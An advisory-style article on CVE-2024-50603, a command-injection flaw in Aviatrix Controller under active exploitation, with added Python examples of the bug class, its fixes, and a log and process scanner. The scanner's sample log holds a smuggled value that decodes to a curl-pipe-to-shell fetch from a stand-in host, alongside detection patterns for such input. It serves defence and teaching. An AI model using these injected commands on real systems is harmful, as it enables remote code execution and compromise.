Exploitation of Vulnerability in Aviatrix Controller

Overview of the Issue

A critical security flaw has been disclosed in the Aviatrix Controller, the management plane of Aviatrix's widely used cloud networking platform. The vulnerability, tracked as CVE-2024-50603 and rated CVSS 10.0, allows an unauthenticated remote attacker to execute arbitrary commands on the controller.


The root cause is operating-system command injection: certain API endpoints take user-supplied input and pass it into OS commands without validating or sanitising it, so an attacker can append shell commands of their own and have them run on the controller. Fixed versions, 7.1.4191 and 7.2.4996, are available, and all users should apply them immediately.
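To make the bug class concrete, here is an added example (written for this page, not code from Aviatrix or from the published PoC) of the vulnerable pattern beside two levels of fix. The parameter name `target`, the `echo` command standing in for the real OS command, and the `ALLOWED_TARGETS` allowlist are all hypothetical; the page does not name the affected endpoints or parameters.

```python
import re
import subprocess

# Hypothetical allowlist for this example; the real controller's parameter
# names and accepted values are not shown on the page.
ALLOWED_TARGETS = {"us-east-1", "eu-west-1", "ap-southeast-2"}
TOKEN_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def vulnerable_probe(target: str) -> str:
    """Vulnerable pattern: the request parameter is interpolated into a shell
    command string and run with shell=True, so ';', '|', backticks and
    '$(...)' inside `target` are interpreted by /bin/sh."""
    cmd = f"echo probing target={target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_only_probe(target: str) -> str:
    """First fix: no shell at all. The value travels as a single argv
    element, so metacharacters reach the program as literal text."""
    argv = ["echo", f"probing target={target}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def hardened_probe(target: str) -> str:
    """Full fix: validate against an allowlist *and* avoid the shell.
    Rejecting unknown values up front means a bypass of one layer
    (say, a later refactor back to shell=True) is not enough on its own."""
    if target not in ALLOWED_TARGETS:
        raise ValueError(f"rejected target: {target!r}")
    return argv_only_probe(target)


def strict_token(value: str) -> str:
    """For parameters that have no fixed allowlist: accept only a
    conservative character class and reject everything else, rather than
    trying to strip or escape the characters an attacker might use."""
    if not TOKEN_RE.fullmatch(value):
        raise ValueError(f"rejected value: {value!r}")
    return value


if __name__ == "__main__":
    payload = "us-east-1; echo INJECTED"
    print(vulnerable_probe(payload), end="")  # second line reads INJECTED
    print(argv_only_probe(payload), end="")   # payload echoed back literally
    try:
        hardened_probe(payload)
    except ValueError as err:
        print("hardened:", err)
    print(hardened_probe("us-east-1"), end="")
```

Running it shows the injected `echo INJECTED` executing only in the `shell=True` version; the argv form prints the payload back as inert text, and the allowlisted form never reaches the command at all. The same split applies to the patch described above: the durable fix is to stop building shell strings from request data, with input validation as the second layer.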

Discovery and Public PoC Release

The vulnerability was uncovered by Jakub Korepta, a researcher at the Polish cybersecurity company Securing, who reported it to Aviatrix. A proof-of-concept (PoC) exploit has since been released publicly, which lowers the bar for attackers and increases the urgency for users to patch.

Scope of the Risk

According to cloud security company Wiz, the Aviatrix Controller is deployed in roughly 3% of enterprise cloud environments. More alarmingly, in 65% of those environments the controller's virtual machine has a path to administrative permissions in the cloud control plane, so code execution on the controller can be turned into control of the surrounding cloud account.

Wiz researchers noted that AWS environments are especially exposed because, by default, the Aviatrix Controller is deployed there with IAM permissions that allow privilege escalation. That default turns a single command-injection bug into a direct route to the cloud control plane.

Real-World Exploitation and Threats

Cybercriminals are actively exploiting this flaw to achieve initial access to systems and carry out further malicious activities. Known threats include:

  • Cryptocurrency mining: attackers are deploying the XMRig miner, hijacking the controller's CPU.
  • Command-and-control (C2) frameworks: the Sliver framework is being deployed as a backdoor for persistent access and follow-on activity.

While Wiz has found no direct evidence of lateral movement within cloud environments, its researchers believe attackers are likely using the flaw to enumerate the cloud permissions available to the controller host and then pivot to data exfiltration.

Recommendations for Immediate Action

Given the active exploitation of this vulnerability, all Aviatrix Controller users should:

  1. Update immediately: install the patched versions (7.1.4191 or 7.2.4996) to close the gap.
  2. Restrict access: ensure the controller's management interface is not reachable from the internet and limit it to trusted networks.
  3. Monitor for compromise: look for cryptocurrency-mining processes such as XMRig, unexpected outbound connections consistent with a C2 implant, unauthorized logins, and abnormal CPU usage. Given the public PoC, treat a controller that was exposed while unpatched as potentially compromised rather than merely at risk.
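As an added example of the monitoring step (written for this page; it is not Aviatrix tooling and does not reflect the controller's real log format), the script below scans constructed web-server-style access-log lines for shell metacharacters in decoded query strings, handling double URL-encoding, and scans a constructed `ps` listing for a known miner name and for executables launched from world-writable directories. The endpoint path `/api/v1/probe`, the parameter `target`, the IP addresses and the process entries are all constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample data for this example only (not Aviatrix log formats):
# nginx/Apache-style access-log lines for an API, and a trimmed `ps` listing.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [13/Jan/2025:09:12:01 +0000] "GET /api/v1/probe?target=us-east-1 HTTP/1.1" 200 512
198.51.100.7 - - [13/Jan/2025:09:12:05 +0000] "GET /api/v1/probe?target=us-east-1%3Bcurl%20http%3A%2F%2Fexample.invalid%2Fx.sh%7Csh HTTP/1.1" 200 512
203.0.113.22 - - [13/Jan/2025:09:13:44 +0000] "POST /api/v1/probe?target=%2524(id) HTTP/1.1" 500 0
203.0.113.10 - - [13/Jan/2025:09:14:02 +0000] "GET /static/app.js HTTP/1.1" 200 9031
"""

SAMPLE_PS = """\
USER  PID %CPU COMMAND
root    1  0.0 /sbin/init
www   812  1.2 /usr/bin/python3 /opt/api/server.py
www  1490 97.5 /tmp/.x/xmrig -o pool.example.invalid:3333
www  1503  0.3 /dev/shm/.svc
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that never belong in a legitimate API parameter value.
SHELL_META_RE = re.compile(r"[;|&`]|\$\(|\$\{|\n")
MINER_RE = re.compile(r"xmrig", re.IGNORECASE)
SUSPICIOUS_PATH_RE = re.compile(r"^(/tmp|/dev/shm|/var/tmp)/")


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads such as
    %2524(id) -> %24(id) -> $(id) are inspected in their final form."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text: str) -> list:
    """Return requests whose decoded query string carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        query = fully_decode(m.group("path").split("?", 1)[1])
        meta = SHELL_META_RE.search(query)
        if meta:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")),
                         "query": query, "token": meta.group(0)})
    return hits


def suspicious_processes(ps_text: str) -> list:
    """Flag processes that look like a miner or run from a world-writable path."""
    hits = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, cpu, command = parts
        reasons = []
        if MINER_RE.search(command):
            reasons.append("known miner name")
        if SUSPICIOUS_PATH_RE.match(command):
            reasons.append("executable in world-writable directory")
        if reasons:
            hits.append({"pid": int(pid), "user": user, "cpu": float(cpu),
                         "command": command, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("request", h["ip"], h["status"], repr(h["token"]), h["query"])
    for p in suspicious_processes(SAMPLE_PS):
        print("process", p["pid"], p["command"], p["reasons"])
```

Two points worth keeping from this: decode before matching, because a single `unquote` would leave `%2524(id)` looking harmless, and do not rely on response status as a filter, since the injected `curl ... | sh` request in the sample returned 200 just like the legitimate one. A Sliver implant has no fixed process name, so the process check only catches the obvious cases; unexpected outbound connections from the controller are the better signal for that part.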

Conclusion

This vulnerability poses a significant threat to cloud environments and requires immediate attention. By applying updates and following security best practices, organizations can protect themselves from these ongoing attacks. Don’t delay—secure your systems now to prevent potential breaches.